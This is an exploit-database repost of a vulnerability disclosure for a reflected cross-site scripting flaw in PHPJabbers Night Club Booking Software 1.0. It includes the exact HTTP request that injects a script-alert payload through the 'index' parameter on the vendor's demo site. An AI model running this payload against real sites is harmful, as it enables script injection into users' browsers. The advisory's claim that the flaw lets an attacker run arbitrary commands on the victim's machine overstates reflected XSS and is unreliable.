Advertisement






Night Club Booking Software 1.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2023-09-18
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090061

Below is a copy:

Night Club Booking Software 1.0 Cross Site Scripting
## Title: Night Club Booking Software-1.0 XSS-Reflected
## Author: nu11secur1ty
## Date: 09/09/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected

## Description:
The value of the index request parameter is copied into the value of an
HTML tag attribute which is encapsulated in double quotation marks. The
payload byymt"><script>alert(1)</script>fs5xr was submitted in the index
parameter. This input was echoed unmodified in the application's response.
The attacker can trick the victim into executing arbitrary commands or
code on his machine remotely.

STATUS: HIGH-CRITICAL Vulnerability

[+]Test Payload:
```GET
/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;
_gat=1; _fbp=fb.1.1694256177815.1029224882
X-Requested-With: XMLHttpRequest
Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116",
"Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0
)

## Proof and Exploit:
[href](
https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html
)

## Time spent:
00:05:00


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.